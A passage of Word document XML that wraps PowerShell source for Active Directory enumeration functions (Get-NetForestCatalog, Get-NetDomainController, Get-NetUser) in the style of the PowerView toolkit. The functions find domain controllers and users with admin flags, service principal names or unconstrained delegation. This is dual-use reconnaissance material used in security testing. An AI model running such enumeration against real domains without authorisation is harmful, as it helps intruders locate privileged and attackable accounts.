    <w:p w14:paraId="71CC6362" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="490D944C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetForestCatalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FEFE74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59746F9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB0B8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2692BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D81BD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B04C49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Forest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B762C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="40A12DF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026CDDC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258509F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDC0712" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4308332D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ForestObject = Get-NetForest -Forest $Forest -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA02615" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16E1BA37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if($ForestObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB18780" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ForestObject.FindAllGlobalCatalogs()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A82A30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B677AD5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE01FE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50350203" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C9B1B29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NetDomainController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056DC738" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F806238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B44E4FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D11DEA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return the current domain controllers for the active domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3196B815" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E20BF30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953922B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="261B4DAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for domain controllers, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007F6EFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33D1BFE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BB81D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04701B2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCEC920" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2706AEED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4671713F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09124BBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Use LDAP queries to determine the domain controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF060F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29C39169" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAE21CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09532884" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5645F32B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548EA0B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7EB7B1F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683340BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1147CE82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetDomainController -Domain 'test.local'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACA1304" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0548465D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Determine the domain controllers for 'test.local'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C02352" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2617C9D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A74120" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="207A6AC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetDomainController -Domain 'test.local' -LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F1B67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="42AB005B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Determine the domain controllers for 'test.local' using LDAP queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353976E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78935F92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C65435" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B994BF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; 'test.local' | Get-NetDomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430362D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="73F2FF4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Determine the domain controllers for 'test.local'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C395E8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FED33F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59EE93E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC8EE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F25402" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798DBDBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB52D3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9569E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="110BCC16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA11853" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2EE1B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="709556AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2B5C6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $LDAP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1685AE52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="217D48C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D8442" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A7B7E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146461F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FFCF81E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($LDAP -or $DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C75D42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # filter string to return all domain controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795175F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -Filter '(userAccountControl:1.2.840.113556.1.4.803:=8192)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45270EB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066BA2A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B87EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FoundDomain = Get-NetDomain -Domain $Domain -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA9631" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($FoundDomain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2150C2C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Founddomain.DomainControllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324BF76C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275FC280" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5814B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112DD717" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26A153B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16155C77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88F18F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7DADC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># "net *" replacements and other fun start below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E83F095" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B1429E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095593F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="331A7294" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetUser {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AA574F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E4265F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A0FEF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B619475" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Query information for a given user or users in the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498920B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        using ADSI and LDAP. Another -Domain can be specified to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB93957" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        query for users across a trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D99A2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Replacement for "net users /domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFC3C1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D9AEBDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B577A7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4602FB41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Username filter string, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6DD163" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F06CEEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033D65FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="657E7978" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for users, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4006D347" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60E41DBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A55B86C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3590DC21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1159B01D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38C5FF02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4CB97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64932DDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5307C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755DE8E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EBCEC1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BAFAAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="402F1556" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69526C51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A1244BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER AdminCount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E38396" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="383C0089" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Switch. Return users with adminCount=1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ED68F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5EE022AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EE5A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05DCB786" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Only return user objects with non-null service principal names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F793537" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67FB7F41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Unconstrained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364DDF9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="648885AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return users that have unconstrained delegation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647CBFB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="20D3E471" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER AllowDelegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF7A6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D3863FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760CA55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
